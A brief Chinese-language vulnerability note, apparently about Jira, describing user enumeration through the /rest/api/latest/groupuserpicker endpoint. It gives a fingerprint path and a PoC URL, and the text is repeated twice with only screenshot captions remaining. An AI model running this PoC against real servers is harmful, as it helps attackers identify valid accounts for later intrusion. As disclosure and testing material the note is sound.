01描述
可通过接口的返回结果,对存在的用户进行枚举
02主面板截图
标识
/secure/Dashboard.jspa
02 漏洞复现
POC:<name>为判断是否存在的用户名
/rest/api/latest/groupuserpicker?query=<name>&maxResults=50&showAvatar=false
不存用户提示
存在用户提示
不存在漏洞返回结果
可通过接口的返回结果,对存在的用户进行枚举
标识
/secure/Dashboard.jspa
POC:<name>为判断是否存在的用户名
/rest/api/latest/groupuserpicker?query=<name>&maxResults=50&showAvatar=false
不存用户提示
存在用户提示
不存在漏洞返回结果